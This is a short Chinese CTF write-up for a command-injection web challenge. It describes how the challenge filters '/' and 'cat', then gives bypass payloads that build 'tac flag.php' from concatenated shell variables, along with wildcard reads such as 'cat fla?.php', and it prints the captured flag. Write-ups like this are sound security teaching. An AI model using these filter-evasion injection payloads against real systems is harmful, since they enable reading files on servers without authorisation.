【web】-rce-Commix

  • 开发
  • 21

打开页面就知道是命令执行

输入ls查看,能够显示文件列表;ls /提示hacker,flag也是Hacker,ls .. 返回上级。说明后台过滤了/ cat等关键词,并没有过滤空格

采用拼接方式的payload:  a=fl;b=ag.php;c=t;d=ac;$c$d $a$b;

或者 cat fla?.php  cat f*

flag: 8b253377d95941f1f862de13ee7c688d

阅读全部

相关推荐

  9. Linux:RHCEweb服务练习

    2024-07-14 08:56:01       27 阅读

最近更新

  3. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-07-14 08:56:01       66 阅读

  4. Could not load dynamic library ‘cudart64_100.dll‘

    2024-07-14 08:56:01       70 阅读

  9. 在Django里面运行非项目文件

    2024-07-14 08:56:01       57 阅读

  19. Python语言-面向对象

    2024-07-14 08:56:01       68 阅读

  20. 如何分清楚常见的 Git 分支管理策略Git Flow、GitHub Flow 和 GitLab Flow

    2024-07-14 08:56:01       62 阅读

热门阅读

  1. CSS 样式缓存不更新

    2024-07-14 08:56:01       24 阅读

  2. 基于go-zero二次开发的脚本

    2024-07-14 08:56:01       21 阅读

  4. Matlab【光伏预测】基于雪融优化算法SAO优化高斯过程回归GPR实现光伏多输入单输出预测附代码

    2024-07-14 08:56:01       23 阅读

  7. RabbitMQ的工作模式

    2024-07-14 08:56:01       17 阅读

  9. 跨域问题出现的原因,怎么解决?

    2024-07-14 08:56:01       21 阅读

  10. Isaac sim中使用不同的backone

    2024-07-14 08:56:01       17 阅读

  11. Python中的pytest的使用

    2024-07-14 08:56:01       26 阅读

  14. Power BI 工具介绍

    2024-07-14 08:56:01       24 阅读

  18. 【C语言】多线程服务器

    2024-07-14 08:56:01       22 阅读

  19. 数学建模如何创新

    2024-07-14 08:56:01       27 阅读

  24. 设计模式使用场景实现示例及优缺点(行为型模式——观察者模式)

    2024-07-14 08:56:01       25 阅读

  26. qt 创建一个包含两按钮,且安装和自定义控件间没有间距

    2024-07-14 08:56:01       22 阅读

  27. 在Qt中,如果你想要限定QLineEdit文本框中浮点数的取值范围

    2024-07-14 08:56:01       26 阅读

  29. 【Qt】使用临时对象的坑

    2024-07-14 08:56:01       21 阅读

  30. C++智能指针的用法

    2024-07-14 08:56:01       23 阅读